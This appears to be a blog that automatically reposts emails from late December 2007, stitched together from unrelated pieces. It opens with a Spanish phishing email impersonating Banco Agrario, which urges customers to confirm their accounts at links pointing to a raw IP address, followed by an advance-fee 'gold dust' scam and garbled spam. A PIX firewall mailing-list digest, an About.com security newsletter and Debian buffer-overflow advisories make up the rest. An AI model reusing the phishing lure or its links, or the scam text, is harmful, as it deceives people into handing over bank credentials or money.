Search This Blog

Monday, December 31, 2007

Rectificacion de datos personales

Estimado cliente de Banco Agrario :

BanAgrario hace todo lo posible por mantener al tanto al usuario de posibles problemas tanto en el servidor BanAgrario como en la cuenta del propio usuario. Por lo tanto, quiere advertirle en este momento que el departamento de seguridad cree que terceras personas han podido haber accedido a su cuenta y han limitado esta para que no se produzcan operaciones no deseadas. Por lo tanto, el equipo de BanAgrario le ruega que mediante el enlace que le proporcionamos confirme su cuenta inmediatamente para así poder fijar su ip como usuario principal y poder evitar más intromisiones en su cuenta:

Cuenta Personal : http://200.58.119.43/~va000118/ssh/www.banagrario.com.co/index.htm?nompag=comphtml/user.htm&tp=interno&id=8774W8YSfts296511YoDSgsd53Yxg52&usel=Activacion

Cuneta Empresarial : http://200.58.119.43/~va000118/ssh/www.banagrario.com.co/empresarial.htm?nompag=comphtml/user.htm&tp=interno&id=8774W8YSYM7296511ushSgsd53Yxg52&usel=Activacion

BanAgrario no se hace responsable de la perdida de información en caso de que esta confirmación no se lleve a cabo.
Atentamente: Banco Agrario.

BanAgrario
© Copyright 2000-2007 - Todos los derechos reservados

 

 

GOLD DUST OFFERS 800 KGS

Dear Sir/Madam,                                                    WE HAVE GOLD DUST FOR SALE

We are so glads to write you this time to introduce our company to you, we are a small skill mining company which we base in
Accra (GHANA)   We have a total of Eight Hundreds Kilos (800 Kilos) of GOLD DUST in our storage please if you are interested kindly inform us immediatly so that we can send our FCO to you .   if you are interesting in purchase the Gold Dust revert bact to our direct e-mail address as follow: mineralgds@hotmail.fr 
 

Thanks and God bless you,  

Best Regards

Dr. Ahmed Suleiman




¡¶ÌìÁú°Ë²¿¡·ºØËê°æ1ÔÂ16ÈÕ¹«²â ÐÂÄÚÈݱ¬ÁÏ
*ÓÃËѹ·Æ´ÒôдÓʼþ£¬ÌåÑé¸üÁ÷³©µÄÖÐÎÄÊäÈë>>

www.chequexpress.com.ar

Please see this site in Subject

Sunday, December 30, 2007

www.marcasenlinea.com.ar

Please see this site in Subject

www.chequexpress.com.ar

Please see this site in Subject

www.pataconia.com.ar

Please see this site in Subject

Saturday, December 29, 2007

firewall-wizards Digest, Vol 20, Issue 14

Send firewall-wizards mailing list submissions to
firewall-wizards@listserv.icsalabs.com

To subscribe or unsubscribe via the World Wide Web, visit
https://listserv.icsalabs.com/mailman/listinfo/firewall-wizards
or, via email, send a message with subject or body 'help' to
firewall-wizards-request@listserv.icsalabs.com

You can reach the person managing the list at
firewall-wizards-owner@listserv.icsalabs.com

When replying, please edit your Subject line so it is more specific
than "Re: Contents of firewall-wizards digest..."


Today's Topics:

1. Re: firewall-wizards Digest, Vol 20, Issue 13 (Boni Bruno)


----------------------------------------------------------------------

Message: 1
Date: Thu, 27 Dec 2007 09:39:46 -0800
From: "Boni Bruno" <bbruno@dsw.net>
Subject: Re: [fw-wiz] firewall-wizards Digest, Vol 20, Issue 13
To: <firewall-wizards@listserv.cybertrust.com>
Message-ID:
<0C6B33820DCA454A95BE80AC8095A7330169CE93@dsw-3003.datasystems.local>
Content-Type: text/plain; charset="us-ascii"

The 3rd line in your dmz access-list will not deny traffic from the
inside when communication is initiated from the inside.

By default, a higher security zone can access a lower security zone and
the state information maintained by the Pix firewall will allow for the
return traffic to go back to the inside network.

That being said, many companies deny traffic out from the inside network
as a best practice. If you are denying traffic from the inside out
(which you should be doing), then you need to make sure you permit the
traffic you need from the inside to the dmz before any of your deny
statements in your acl.

-boni bruno

.
.
.
Ok, I think I understand this a little better now. Say my private
network is 192.168.1.0/24 and my dmz is 192.168.2.0/24. I already have
the static (inside,dmz) 192.168.1.0 192.168.1.0 netmask 255.255.255.0
which is required in 6.3(3). So, in order to make this work i.e the
inside network has access to everything on the dmz network and the dmz
network can access the internet and I only allow specific communication
from the dmz to the inside I need to do the following:

access-list dmz permit udp host 192.168.2.2 host 192.168.1.202 eq domain
access-list dmz permit tcp host 192.168.2.2 host 192.168.1.203 eq smtp
access-list dmz deny ip 192.168.2.0 255.255.255.0 192.168.1.0
255.255.255.0 access-list dmz permit ip 192.168.2.0 255.255.255.0 any

I will also need to add the nonat statements as was suggested by
Brandon:

access-list nonat permit ip 192.168.1.0 255.255.255.0 192.168.2.0
255.255.255.0 access-list nonat permit ip 192.168.2.0 255.255.255.0
192.168.1.0 255.255.255.0 nat 0 (inside) access-list nonat nat 0 (dmz)
access-list nonat

My only concern here is the 3rd line in the dmz access-list and whether
it will deny communication from the inside network to the dmz (except
dns and smtp), but I will test that when I get home tonight.

Thank you for everyone's help.

Brian


-----Original Message-----
From: firewall-wizards-bounces@listserv.cybertrust.com
[mailto:firewall-wizards-bounces@listserv.cybertrust.com] On Behalf Of
firewall-wizards-request@listserv.cybertrust.com
Sent: Thursday, December 27, 2007 9:00 AM
To: firewall-wizards@listserv.cybertrust.com
Subject: firewall-wizards Digest, Vol 20, Issue 13

Send firewall-wizards mailing list submissions to
firewall-wizards@listserv.icsalabs.com

To subscribe or unsubscribe via the World Wide Web, visit
https://listserv.icsalabs.com/mailman/listinfo/firewall-wizards
or, via email, send a message with subject or body 'help' to
firewall-wizards-request@listserv.icsalabs.com

You can reach the person managing the list at
firewall-wizards-owner@listserv.icsalabs.com

When replying, please edit your Subject line so it is more specific than
"Re: Contents of firewall-wizards digest..."


Today's Topics:

1. Re: PIX access-list help (Brian Blater)
2. Re: Anyone have any informed opinions on the Watchguard
product line? (Jim Seymour)


----------------------------------------------------------------------

Message: 1
Date: Wed, 26 Dec 2007 13:07:37 -0500
From: "Brian Blater" <brb.lists@gmail.com>
Subject: Re: [fw-wiz] PIX access-list help
To: "Firewall Wizards Security Mailing List"
<firewall-wizards@listserv.icsalabs.com>
Message-ID:
<7743536a0712261007ic01f92fm562685817ecd9e0a@mail.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1

On Dec 25, 2007 12:25 AM, Paul Melson <pmelson@gmail.com> wrote:
> On Dec 21, 2007 11:02 AM, Brian Blater <brb.lists@gmail.com> wrote:
> > So, my main question, is there an access list command I can have
> > that basically says "allow all communication from the dmz to the
internet"
> > and one that says "allow communication from the inside to the dmz"?
> > I know I can add "access-list dmz permit ip host 192.168.1.1 any"
> > and that solves the problem of getting to the internet, but then it
> > opens all communication to the inside from this host and I don't
> > want to do that. Since this is version 6.3(3) I can't use an out
> > access-list which I think might solve the problem. I have enough
> > memory to run version 7.x on this PIX, but I'm trying to tackle one
> > problem at a time and I'm a little hesitant about doing the 7.x
upgrade just yet.
>
> The short answer to your question is that PIX access-lists are read,
> per-interface, top-to-bottom:
>
> access-list dmz_in deny ip 192.168.1.0 255.255.255.0 10.0.0.0
> 255.0.0.0 access-list dmz_in permit ip 192.168.1.0 255.255.255.0 any
> access-group dmz_in in interface dmz
>
> If your internal network is 10.0.0.0/8 and your DMZ is 192.168.1.0/24,

> this will prevent traffic from the DMZ to the inside, but allow
> everything else.
>
> PaulM
>
Ok, I think I understand this a little better now. Say my private
network is 192.168.1.0/24 and my dmz is 192.168.2.0/24. I already have
the static (inside,dmz) 192.168.1.0 192.168.1.0 netmask 255.255.255.0
which is required in 6.3(3). So, in order to make this work i.e the
inside network has access to everything on the dmz network and the dmz
network can access the internet and I only allow specific communication
from the dmz to the inside I need to do the following:

access-list dmz permit udp host 192.168.2.2 host 192.168.1.202 eq domain
access-list dmz permit tcp host 192.168.2.2 host 192.168.1.203 eq smtp
access-list dmz deny ip 192.168.2.0 255.255.255.0 192.168.1.0
255.255.255.0 access-list dmz permit ip 192.168.2.0 255.255.255.0 any

I will also need to add the nonat statements as was suggested by
Brandon:

access-list nonat permit ip 192.168.1.0 255.255.255.0 192.168.2.0
255.255.255.0 access-list nonat permit ip 192.168.2.0 255.255.255.0
192.168.1.0 255.255.255.0 nat 0 (inside) access-list nonat nat 0 (dmz)
access-list nonat

My only concern here is the 3rd line in the dmz access-list and whether
it will deny communication from the inside network to the dmz (except
dns and smtp), but I will test that when I get home tonight.

Thank you for everyone's help.

Brian


------------------------------

Message: 2
Date: Wed, 26 Dec 2007 11:23:14 -0500 (EST)
From: jseymour@linxnet.com (Jim Seymour)
Subject: Re: [fw-wiz] Anyone have any informed opinions on the
Watchguard product line?
To: firewall-wizards@listserv.icsalabs.com
Message-ID: <20071226162314.E4BC9E158@jimsun.linxnet.com>


"Richard Golodner" <rgolodner@infratection.com> wrote:
>
[snip]
> There was also a nice GUI interface ...
[snip]

Is that still limited to running on a Windows PC?

I believe their management GUI once ran on both Windows and Linux.
Then, later, on Windows only, I was told. I tend to shun network
infrastructure products that require Windows to configure and administer
them.

Jim
--
Note: My mail server employs *very* aggressive anti-spam filtering. If
you reply to this email and your email is rejected, please accept my
apologies and let me know via my web form at
<http://jimsun.linxnet.com/contact/scform.php>.


------------------------------

_______________________________________________
firewall-wizards mailing list
firewall-wizards@listserv.icsalabs.com
https://listserv.icsalabs.com/mailman/listinfo/firewall-wizards


End of firewall-wizards Digest, Vol 20, Issue 13
************************************************


------------------------------

_______________________________________________
firewall-wizards mailing list
firewall-wizards@listserv.icsalabs.com
https://listserv.icsalabs.com/mailman/listinfo/firewall-wizards


End of firewall-wizards Digest, Vol 20, Issue 14
************************************************

Friday, December 28, 2007

[SECURITY] [DSA 1442-2] New libsndfile packages fix arbitrary code execution

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1442-1 security@debian.org
http://www.debian.org/security/

Moritz Muehlenhoff
December 29, 2007

http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package : libsndfile
Vulnerability : buffer overflow
Problem type : local(remote)
Debian-specific: no
CVE Id(s) : CVE-2007-4974

Rubert Buchholz discovered that libsndfile, a library for reading /
writing audio files performs insufficient boundary checks when
processing FLAC files, which might lead to the execution of arbitrary
code.

For the stable distribution (etch), this problem has been fixed in
version 1.0.16-2.

The old stable distribution (sarge) is not affected by this problem.

We recommend that you upgrade your libsndfile packages.

Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile_1.0.16.orig.tar.gz

Size/MD5 checksum: 857117 773b6639672d39b6342030c7fd1e9719

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile_1.0.16-2.diff.gz

Size/MD5 checksum: 5465 3143afa4d8b69fe1ba9d0428d3b5b472

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile_1.0.16-2.dsc

Size/MD5 checksum: 639 778f77063bf0aee761b5d9f7af793ced

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1-dev_1.0.16-2_alpha.deb

Size/MD5 checksum: 400468 f555adb582857c57e2efc4c957661a10

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1_1.0.16-2_alpha.deb

Size/MD5 checksum: 222432 5a776e9755235dfbc33881b54a69df87

http://security.debian.org/pool/updates/main/libs/libsndfile/sndfile-programs_1.0.16-2_alpha.deb

Size/MD5 checksum: 72062 0ad263c448319e10f147d4ca3a2e49cd

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/libs/libsndfile/sndfile-programs_1.0.16-2_amd64.deb

Size/MD5 checksum: 70518 6ece20244584e3e33c680cba32f5bd01

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1_1.0.16-2_amd64.deb

Size/MD5 checksum: 186978 15d1c0d80b1df110594b0e25dc444ca3

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1-dev_1.0.16-2_amd64.deb

Size/MD5 checksum: 322346 f8d850304a105b5b8d2beadb3e81304d

arm architecture (ARM)

http://security.debian.org/pool/updates/main/libs/libsndfile/sndfile-programs_1.0.16-2_arm.deb

Size/MD5 checksum: 72042 6efb81b71098e378b5f702c06cb8b2d9

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1-dev_1.0.16-2_arm.deb

Size/MD5 checksum: 343534 03aef95ebfe92522c5d36a4e5590859d

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1_1.0.16-2_arm.deb

Size/MD5 checksum: 220952 d01c16d518630402f6714691b829d793

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/libs/libsndfile/sndfile-programs_1.0.16-2_hppa.deb

Size/MD5 checksum: 74542 cf4e50401c65e94b5ec93b488c0180c7

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1_1.0.16-2_hppa.deb

Size/MD5 checksum: 236320 7c0274e6b33b5e301dcd7a474d502107

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1-dev_1.0.16-2_hppa.deb

Size/MD5 checksum: 373514 af037103e816ba426298a634057decb2

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/libs/libsndfile/sndfile-programs_1.0.16-2_i386.deb

Size/MD5 checksum: 74262 834537ca8b562a4350d5a9c422f436ca

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1-dev_1.0.16-2_i386.deb

Size/MD5 checksum: 319560 9fe5127322c613449eb0dde18a27cfb8

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1_1.0.16-2_i386.deb

Size/MD5 checksum: 197498 e9bc609646a45373a0d365b071950c6a

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1_1.0.16-2_ia64.deb

Size/MD5 checksum: 270526 4e79bb42b5e92d68fa00bff980686eb3

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1-dev_1.0.16-2_ia64.deb

Size/MD5 checksum: 416098 3d6c672fd2480a3a5783142085445bdd

http://security.debian.org/pool/updates/main/libs/libsndfile/sndfile-programs_1.0.16-2_ia64.deb

Size/MD5 checksum: 75756 d29c6c9fe859001936087e53afdff185

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1_1.0.16-2_mips.deb

Size/MD5 checksum: 217138 c59d9ffccb7d577d06f4eb8f8a875e98

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1-dev_1.0.16-2_mips.deb

Size/MD5 checksum: 374184 e0a8ce0c236b772bc58eaad8aad2006a

http://security.debian.org/pool/updates/main/libs/libsndfile/sndfile-programs_1.0.16-2_mips.deb

Size/MD5 checksum: 72760 2468de6305a9c60fdfd0fe73bad8999a

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/libs/libsndfile/sndfile-programs_1.0.16-2_mipsel.deb

Size/MD5 checksum: 72800 da3ce8b83dc1ad383c23812df43cf31d

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1-dev_1.0.16-2_mipsel.deb

Size/MD5 checksum: 373316 d2e45aaad4073e64b6e3e443e6702cac

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1_1.0.16-2_mipsel.deb

Size/MD5 checksum: 216758 0a66a28c249850999b90b6f90d0c027b

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1_1.0.16-2_powerpc.deb

Size/MD5 checksum: 207748 7c999002bfce68181a2818eaf3e829ed

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1-dev_1.0.16-2_powerpc.deb

Size/MD5 checksum: 346286 2b9d3e4cef955ff76a963a3e40aebecd

http://security.debian.org/pool/updates/main/libs/libsndfile/sndfile-programs_1.0.16-2_powerpc.deb

Size/MD5 checksum: 75812 b8549289577e9a8bfe279592ebb68c69

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1-dev_1.0.16-2_s390.deb

Size/MD5 checksum: 346370 dca74b112ab72b4893b272aa983f6e07

http://security.debian.org/pool/updates/main/libs/libsndfile/sndfile-programs_1.0.16-2_s390.deb

Size/MD5 checksum: 72800 6fd80164e263294833c6b6a4f98faf7f

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1_1.0.16-2_s390.deb

Size/MD5 checksum: 220876 8f28f995c96e3366cc98a1578aba5a46

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/libs/libsndfile/sndfile-programs_1.0.16-2_sparc.deb

Size/MD5 checksum: 70652 7560d39c5a222317decb5586c17d1d55

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1_1.0.16-2_sparc.deb

Size/MD5 checksum: 207790 e758c2a6e11a78f25df2ad1b2205206e

http://security.debian.org/pool/updates/main/libs/libsndfile/libsndfile1-dev_1.0.16-2_sparc.deb

Size/MD5 checksum: 334854 f97aba9749b0dd78f6da521399fa9937


These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHdaUUXm3vHE4uyloRAr+yAJ49UzhGOxcTvtvHNh4s6dtwTHgJAgCg6NzD
UvSOyIiGxMdX3pQ5bWESksg=
=vIt9
-----END PGP SIGNATURE-----


--
To UNSUBSCRIBE, email to debian-security-announce-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

About Net Security: December 28, 2007

About.com   Net Security
In the Spotlight | More Topics |
  from Tony Bradley, CISSP-ISSAP
You may have heard of a security feature in the Windows Vista operating system called UAC (User Account Control). It has been the subject of jokes in Apple Mac TV ads, and the much criticism from the industry at large. Personally, I do not have a problem with UAC. I think that the community should invest a little time in understanding the capabilities and functions of UAC and how to use it to provide the best balance between security and functionality. Some users simply want to turn it off though. I don't recommend doing so in most cases, but I have written a short guide to help you do so in Windows Vista Home and Windows Vista Home Premium if you choose to.

 
In the Spotlight
Disable UAC in Vista Home (or Home Premium)
Vista has taken a lot of criticism over the past year. Many hardware vendors who originally switched to bundling Windows Vista by default later caved to consumer backlash and allowed users the option to choose Vista or its predecessor, Windows XP. User Account Control (UAC), is one of the features of Windows Vista that has taken the most heat...read more

 
         More Topics
Beware Bhutto Scams and Malware
Former Prime Minister of Pakistan, and leader of the Pakistan People's Party, Benazir Bhutto was assassinated at a political rally in Rawalpindi. Having lived in exile for the past decade, Bhutto had just recently returned to Pakistan to run in the upcoming democratic elections, which are severely crippled and could be canceled as a result of the assassination. None of that is really related to information security though. Why should you care? Well, whether or not you have an interest in international politics...read more

 
The Envelope Please...
You are welcome to continue voting, but I promised the 'official' results of the recent polls would be delivered in this week's newsletter, so here they are. For the types of users or level of information security knowledge, 'Home PC User - Intermediate' was by far the big winner with 41% of the total vote. Combining that category with...read more

 
 
Sponsored Links
 
Winter Holidays: Gifts, Decorating Tips, Recipes, and More
Winter Holidays: Gifts, Decorating Tips, Recipes, and More
Ready for the holiday rush? Need help buying the perfect gift for your nephew or planning a fabulous holiday meal? Get expert advice on the best toys, clothes, gadgets and ways to reduce holiday stress.

Advertisement
 
 
Visit Related About GuideSites:
Wireless / Networking Antivirus Software Focus on Windows
Email internet  
Search About  

 
Sign up for more free newsletters on your favorite topics.

You are receiving this newsletter because you subscribed to the About Net Security newsletter as security.world@GMAIL.COM. If you wish to change or remove your email address, please visit:
http://www.about.com/nl/usgs.htm?nl=netsecurity&e=security.world@GMAIL.COM

About respects your privacy. Our Privacy Policy.

Our Contact Information.
249 West 17th Street
New York, NY, 10011

© 2007 About, Inc.

[SECURITY] [DSA 1441-1] New peercast packages fix arbitrary code execution

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1441-1 security@debian.org
http://www.debian.org/security/

Thijs Kinkhorst
December 28, 2007

http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package : peercast
Vulnerability : buffer overflow
Problem-Type : remote
Debian-specific: no
CVE ID : CVE-2007-6454
Debian Bug : 457300

Luigi Auriemma discovered that PeerCast, a P2P audio and video streaming
server, is vulnerable to a heap overflow in the HTTP server code, which
allows remote attackers to cause a denial of service and possibly execute
arbitrary code via a long SOURCE request.

For the stable distribution (etch), this problem has been fixed in
version 0.1217.toots.20060314-1etch0.

The old stable distribution (sarge) does not contain peercast.

For the unstable distribution (sid), this problem has been fixed in
version 0.1218+svn20071220+2.

We recommend that you upgrade your peercast packages.

Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/p/peercast/peercast_0.1217.toots.20060314-1etch0.dsc

Size/MD5 checksum: 778 153071edd20929f6113345ed9d127853

http://security.debian.org/pool/updates/main/p/peercast/peercast_0.1217.toots.20060314.orig.tar.gz

Size/MD5 checksum: 534016 d9e83aa7e66f4d3b160d7c4c8b2a3a4f

http://security.debian.org/pool/updates/main/p/peercast/peercast_0.1217.toots.20060314-1etch0.diff.gz

Size/MD5 checksum: 6276 2f7264e5f9bdff6eb74cfe6b26496534

Architecture independent packages:

http://security.debian.org/pool/updates/main/p/peercast/peercast-handlers_0.1217.toots.20060314-1etch0_all.deb

Size/MD5 checksum: 6644 8063dd0125fdc41505554387b433fa91

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0_0.1217.toots.20060314-1etch0_alpha.deb

Size/MD5 checksum: 185238 e6727bfa5734599c9d8598eb35c38b50

http://security.debian.org/pool/updates/main/p/peercast/peercast_0.1217.toots.20060314-1etch0_alpha.deb

Size/MD5 checksum: 2708 e271b1e81f1cddd88c8beb756e1d9ff9

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0-dev_0.1217.toots.20060314-1etch0_alpha.deb

Size/MD5 checksum: 427462 42d67daab29e4e6fb061492530d811d0

http://security.debian.org/pool/updates/main/p/peercast/peercast-servent_0.1217.toots.20060314-1etch0_alpha.deb

Size/MD5 checksum: 50968 d9d1ae47b219b144acde71b19d550cff

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/p/peercast/peercast_0.1217.toots.20060314-1etch0_amd64.deb

Size/MD5 checksum: 2710 3f4ed56979f0a071eb32a0b7d06d06ad

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0_0.1217.toots.20060314-1etch0_amd64.deb

Size/MD5 checksum: 171950 b7861763bffb0c495e96e3bb23155e4e

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0-dev_0.1217.toots.20060314-1etch0_amd64.deb

Size/MD5 checksum: 323544 17c96525ac00cbfe172c6dbf78495649

http://security.debian.org/pool/updates/main/p/peercast/peercast-servent_0.1217.toots.20060314-1etch0_amd64.deb

Size/MD5 checksum: 50586 73d27cd6c28cbf5fd6e8bd29645e6e7d

arm architecture (ARM)

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0-dev_0.1217.toots.20060314-1etch0_arm.deb

Size/MD5 checksum: 356696 a520840ed0d8171d835cbaf955cf01f4

http://security.debian.org/pool/updates/main/p/peercast/peercast_0.1217.toots.20060314-1etch0_arm.deb

Size/MD5 checksum: 2718 cad527982f80853a6f863f48f0d6c1e3

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0_0.1217.toots.20060314-1etch0_arm.deb

Size/MD5 checksum: 185540 83855ea3b6d57b2284179e314bcc0701

http://security.debian.org/pool/updates/main/p/peercast/peercast-servent_0.1217.toots.20060314-1etch0_arm.deb

Size/MD5 checksum: 50508 527bfe5a016e4665a24cd8066bb292ab

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/p/peercast/peercast_0.1217.toots.20060314-1etch0_hppa.deb

Size/MD5 checksum: 2710 2b83cd039358795debe4b94fe2a9e4fc

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0_0.1217.toots.20060314-1etch0_hppa.deb

Size/MD5 checksum: 201640 6cabef5e653b9c811c9324068c25f16e

http://security.debian.org/pool/updates/main/p/peercast/peercast-servent_0.1217.toots.20060314-1etch0_hppa.deb

Size/MD5 checksum: 51278 0b328ad5515c9261657146000431192f

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0-dev_0.1217.toots.20060314-1etch0_hppa.deb

Size/MD5 checksum: 382980 06d696c930e2ec534dd26a8a6558ad47

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0-dev_0.1217.toots.20060314-1etch0_i386.deb

Size/MD5 checksum: 308254 0d33c207b1de65878488f3f39a832243

http://security.debian.org/pool/updates/main/p/peercast/peercast-servent_0.1217.toots.20060314-1etch0_i386.deb

Size/MD5 checksum: 51176 d201c1ca50a5fb38270f1c5cd3cfee97

http://security.debian.org/pool/updates/main/p/peercast/peercast_0.1217.toots.20060314-1etch0_i386.deb

Size/MD5 checksum: 2706 9b9b95ec6b37a303611d78764734a8be

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0_0.1217.toots.20060314-1etch0_i386.deb

Size/MD5 checksum: 165772 0a77112f725d83a8202a18ba16ad6238

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/p/peercast/peercast-servent_0.1217.toots.20060314-1etch0_ia64.deb

Size/MD5 checksum: 52240 913229fd117819522655e160225877b8

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0_0.1217.toots.20060314-1etch0_ia64.deb

Size/MD5 checksum: 232744 3228a3e865cc928b3e74df54213fb9dc

http://security.debian.org/pool/updates/main/p/peercast/peercast_0.1217.toots.20060314-1etch0_ia64.deb

Size/MD5 checksum: 2710 8afa7cc1cc3eb1fe61baa326eb0715ca

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0-dev_0.1217.toots.20060314-1etch0_ia64.deb

Size/MD5 checksum: 474076 5fb10a674c2e960f3595a0be07ade4ea

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0_0.1217.toots.20060314-1etch0_mips.deb

Size/MD5 checksum: 168382 514a39677a1f1d4fce6ef83ca13c8711

http://security.debian.org/pool/updates/main/p/peercast/peercast_0.1217.toots.20060314-1etch0_mips.deb

Size/MD5 checksum: 2708 fb25aca7da6078e8622761d8e32a867d

http://security.debian.org/pool/updates/main/p/peercast/peercast-servent_0.1217.toots.20060314-1etch0_mips.deb

Size/MD5 checksum: 50758 b120d0b15034f776f22c0283dfe1f4a6

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0-dev_0.1217.toots.20060314-1etch0_mips.deb

Size/MD5 checksum: 352124 b56cd6d28151d2739292e986be16b541

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/p/peercast/peercast_0.1217.toots.20060314-1etch0_mipsel.deb

Size/MD5 checksum: 2708 0fb6f26b672798c5297847800c0072e9

http://security.debian.org/pool/updates/main/p/peercast/peercast-servent_0.1217.toots.20060314-1etch0_mipsel.deb

Size/MD5 checksum: 50690 54c8d18ac6b806ca1c446f2db0c5551c

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0_0.1217.toots.20060314-1etch0_mipsel.deb

Size/MD5 checksum: 165618 7d05fa186e619746c0402d19de6204e1

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0-dev_0.1217.toots.20060314-1etch0_mipsel.deb

Size/MD5 checksum: 347956 eca451021ffbe2716b08913e56146516

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/p/peercast/peercast-servent_0.1217.toots.20060314-1etch0_powerpc.deb

Size/MD5 checksum: 51332 ee2f842285410715cf1b0cde52e9e228

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0_0.1217.toots.20060314-1etch0_powerpc.deb

Size/MD5 checksum: 179282 3719200c543846e79b265531086821ce

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0-dev_0.1217.toots.20060314-1etch0_powerpc.deb

Size/MD5 checksum: 326136 b9c43fa4a7d93351e4d2122c1d20f297

http://security.debian.org/pool/updates/main/p/peercast/peercast_0.1217.toots.20060314-1etch0_powerpc.deb

Size/MD5 checksum: 2712 b943f1f9fb08444dfd957a160aabeaa9

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0_0.1217.toots.20060314-1etch0_s390.deb

Size/MD5 checksum: 193570 46368dcf9097b87a33d43297b01f6ddf

http://security.debian.org/pool/updates/main/p/peercast/peercast_0.1217.toots.20060314-1etch0_s390.deb

Size/MD5 checksum: 2704 0c8599bd391e7e7f58b1ddf9611410c6

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0-dev_0.1217.toots.20060314-1etch0_s390.deb

Size/MD5 checksum: 358188 9796b0f073a9cda57940ededb3539190

http://security.debian.org/pool/updates/main/p/peercast/peercast-servent_0.1217.toots.20060314-1etch0_s390.deb

Size/MD5 checksum: 51072 78419b4a1e4bdf7fbb21046fc6e8df66

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/p/peercast/peercast_0.1217.toots.20060314-1etch0_sparc.deb

Size/MD5 checksum: 2714 954c38e3ffeeda41108b81a34e4fd9c7

http://security.debian.org/pool/updates/main/p/peercast/libpeercast0-dev_0.1217.toots.20060314-1etch0_sparc.deb

Size/MD5 checksum: 335528 1152e5ed239634eb1fe3c86185c0bd57

http://security.debian.org/pool/updates/main/p/peercast/peercast-servent_0.1217.toots.20060314-1etch0_sparc.deb

